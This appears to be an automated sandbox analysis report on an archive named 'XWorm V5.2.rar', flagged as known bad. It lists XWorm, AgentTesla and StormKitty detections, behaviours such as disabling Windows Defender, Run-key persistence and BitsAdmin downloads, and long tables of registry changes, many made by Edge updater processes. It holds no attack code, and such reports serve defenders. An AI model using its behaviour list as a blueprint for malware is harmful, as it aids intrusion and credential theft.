Analysis Overview
SHA256
fa4e6545f776160094004f3bfc1c9e199ec43e22870b1674b48ecc9a80ec71fb
Threat Level: Known bad
The file XWorm V5.2.rar was found to be: Known bad.
Malicious Activity Summary
StormKitty payload
AgentTesla payload
Stormkitty family
Xworm
Detect Xworm Payload
AgentTesla
Contains code to disable Windows Defender
Agenttesla family
AgentTesla payload
Sets file execution options in registry
Downloads MZ/PE file
Modifies Installed Components in the registry
Obfuscated with Agile.Net obfuscator
Registers COM server for autorun
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Uses the VBS compiler for execution
Checks installed software on the system
Installs/modifies Browser Helper Object
Adds Run key to start application
Looks up external IP address via web service
Checks system information in the registry
Drops file in System32 directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
System policy modification
Suspicious use of SendNotifyMessage
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: AddClipboardFormatListener
Modifies Internet Explorer settings
Modifies registry class
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Download via BitsAdmin
Suspicious behavior: GetForegroundWindowSpam
Checks SCSI registry key(s)
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-16 13:00
Signatures
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Agenttesla family
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stormkitty family
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-16 13:00
Reported
2024-05-16 13:21
Platform
win10v2004-20240426-en
Max time kernel
1199s
Max time network
1200s
Command Line
Signatures
AgentTesla
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\ = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\StubPath = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Localized Name = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\IsInstalled = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Version = "43,0,0,0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
Sets file execution options in registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe | C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" | C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\XClient.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\e5f39b6\winzip28-lan.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{4A749F25-A9E2-4CBE-9859-CF7B15255E14}\LocalServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{B54934CD-71A6-4698-BDC2-AFEA5B86504C}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\INPROCSERVER32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\LocalServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4A749F25-A9E2-4CBE-9859-CF7B15255E14}\LocalServer32\ServerExecutable = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\notification_click_helper.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B54934CD-71A6-4698-BDC2-AFEA5B86504C}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2405-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2405-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\notification_helper.exe\"" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\INPROCSERVER32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\LocalServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\LocalServer32\ServerExecutable = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\notification_helper.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\BHO\\ie_to_edge_bho_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\PdfPreview\\PdfPreviewHandler.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B54934CD-71A6-4698-BDC2-AFEA5B86504C}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\EBWebView\\x64\\EmbeddedBrowserWebView.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4A749F25-A9E2-4CBE-9859-CF7B15255E14}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\notification_click_helper.exe\"" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" | C:\Users\Admin\Downloads\7z2405-x64.exe | N/A |
Uses the VBS compiler for execution
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\!BCILauncher = "\"C:\\Windows\\Temp\\MUBSTemp\\BCILauncher.EXE\" bgaupmi=5A4941436A5B41B98951FE8BC14A1C5C" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BFFC50DF-F311-4333-81BC-37376CAA023B}\BGAUpdate.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\msedge_resetsb_{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062} = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window --reset-startup-boost-last-used" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
Checks installed software on the system
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
